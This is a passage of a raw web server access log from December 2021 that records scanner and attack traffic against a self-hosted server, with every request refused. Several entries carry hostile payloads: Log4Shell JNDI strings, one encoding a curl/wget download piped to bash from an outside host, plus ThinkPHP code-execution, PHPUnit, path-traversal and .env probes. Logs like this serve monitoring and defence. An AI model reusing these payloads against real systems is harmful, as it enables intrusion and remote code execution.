Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:07:53:51 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Dec/2021:08:27:36 +0000] 400 - - http localhost "-" [Client 193.29.13.29] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:08:37:46 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.196] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Dec/2021:08:47:39 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.213] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Dec/2021:09:28:35 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Dec/2021:10:17:44 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:10:17:44 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:10:59:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 79.172.212.132] [Length 0] [Gzip -] "/${jndi:ldap://121.140.99.236:1389/Exploit}" "-" [30/Dec/2021:11:04:18 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Dec/2021:11:48:45 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:11:48:45 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:11:49:13 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [30/Dec/2021:12:00:40 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:12:00:40 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:12:04:54 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 198.199.104.59] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Dec/2021:12:17:59 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:12:17:59 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:13:18:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.122] [Length 0] [Gzip -] "-" "-" [30/Dec/2021:14:14:57 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Dec/2021:15:05:53 +0000] 444 - GET https localhost "/" [Client 109.248.6.86] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [30/Dec/2021:15:19:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Dec/2021:15:19:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Dec/2021:15:53:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.236.146.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [30/Dec/2021:15:53:14 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.241] [Length 0] [Gzip -] "-" "-" [30/Dec/2021:15:53:15 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.241] [Length 0] [Gzip -] "-" "-" [30/Dec/2021:15:53:16 +0000] 400 - - http localhost "-" [Client 185.220.100.241] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:15:53:22 +0000] 400 - - http localhost "-" [Client 185.220.100.241] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:16:03:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [30/Dec/2021:16:03:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [30/Dec/2021:16:03:33 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [30/Dec/2021:16:03:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [30/Dec/2021:16:38:50 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [30/Dec/2021:16:43:56 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.56.102.25] [Length 252] [Gzip -] "colly - https://github.com/gocolly/colly/v2" "-" [30/Dec/2021:17:07:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [30/Dec/2021:17:07:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [30/Dec/2021:17:07:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Dec/2021:17:27:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.210.196] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Dec/2021:17:40:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Dec/2021:17:46:03 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [30/Dec/2021:18:20:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [30/Dec/2021:19:04:08 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:19:04:08 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Dec/2021:19:27:33 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.53.74] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Dec/2021:19:49:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.42] [Length 0] [Gzip -] "-" "-" [30/Dec/2021:19:49:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.42] [Length 252] [Gzip -] "-" "-" [30/Dec/2021:19:49:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Dec/2021:19:56:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Dec/2021:20:37:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Dec/2021:21:10:27 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [30/Dec/2021:21:42:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.222.35.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [30/Dec/2021:21:42:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.222.35.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [30/Dec/2021:21:42:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.222.35.196] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [30/Dec/2021:21:42:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 34.222.35.196] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [30/Dec/2021:21:42:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 34.222.35.196] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [30/Dec/2021:21:42:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 34.222.35.196] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [30/Dec/2021:21:51:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.195.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Dec/2021:21:51:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Dec/2021:21:53:49 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.10] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Dec/2021:22:54:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [31/Dec/2021:00:14:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:00:52:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.236.109] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:02:38:39 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:02:38:40 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:04:40:36 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Dec/2021:05:13:27 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Dec/2021:05:32:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:06:27:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [31/Dec/2021:07:30:14 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Dec/2021:07:43:55 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 45.134.144.108] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64" "-" [31/Dec/2021:08:42:49 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:08:52:12 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.207.171] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:08:59:17 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:15:23 +0000] 444 - GET https localhost "/" [Client 172.104.140.107] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:15:23 +0000] 444 - OPTIONS https localhost "/" [Client 172.104.140.107] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:15:23 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 172.104.140.107] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:15:24 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:15:29 +0000] 400 - - https localhost "-" [Client 172.104.140.107] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:15:30 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:15:30 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:15:31 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:15:31 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:15:32 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:16:08 +0000] 400 - SSTP_DUPLEX_POST https 64.22.31.253 "/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:16:08 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/nmaplowercheck1640942168" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/Portal0000.htm" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/.git/HEAD" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/indice.cfm" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/Portal0000.htm" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/.git/HEAD" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/nmaplowercheck1640942168" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/indice.cfm" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/Portal/Portal.mwsl" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:08 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/Portal/Portal.mwsl" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - POST https 64-22-31-253.res.aeneas.net "/sdk" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/__Additional" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/home.cgi" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/pools/default/buckets" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https localhost "/" [Client 172.104.140.107] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:16:09 +0000] 400 - POST http 64-22-31-253.res.aeneas.net "/sdk" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/home.cgi" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/pools/default/buckets" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/favicon.ico" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/__Additional" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/docs/cplugError.html/" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/wSLF" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/favicon.ico" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/docs/cplugError.html/" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:09 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/CSS/Miniweb.css" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 444 - POST https 64-22-31-253.res.aeneas.net "/scripts/WPnBr.dll" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/HNAP1" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/CSS/Miniweb.css" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - POST http 64-22-31-253.res.aeneas.net "/scripts/WPnBr.dll" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/main.aspx" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/pools" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/HNAP1" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 444 - HEAD https 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - HEAD http 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/main.html" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:10 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:11 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/main.html" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:11 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:11 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/index.php" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:11 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:12 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/index.php" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:12 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/start.jhtml" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:12 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/start.jhtml" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:13 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/indice.jhtml" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:13 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/indice.jhtml" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:14 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/home.cfm" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:14 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/home.cfm" [Client 172.104.140.107] [Length 252] [Gzip 